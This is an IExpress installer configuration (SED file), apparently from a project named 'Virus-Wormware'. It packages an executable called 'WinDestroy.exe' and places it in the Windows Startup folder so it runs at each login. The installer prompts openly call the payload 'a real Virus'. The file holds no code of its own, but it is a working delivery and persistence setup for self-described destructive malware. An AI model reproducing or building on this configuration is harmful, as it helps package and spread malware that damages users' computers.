[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=0
HideExtractAnimation=0
UseLongFileName=0
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=AS
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=This is a real Virus. Please Continue at your own risk.
DisplayLicense=
FinishMessage=Successfully Installed the Virus
TargetName=C:\Users\pppmi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.EXE
FriendlyName=WinDestroy
AppLaunched=WinDestroy.exe
PostInstallCmd=<None>
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="WinDestroy.exe"
[SourceFiles]
SourceFiles0=C:\Users\pppmi\Documents\GitHub\Virus-Wormware\main virus\
[SourceFiles0]
%FILE0%=
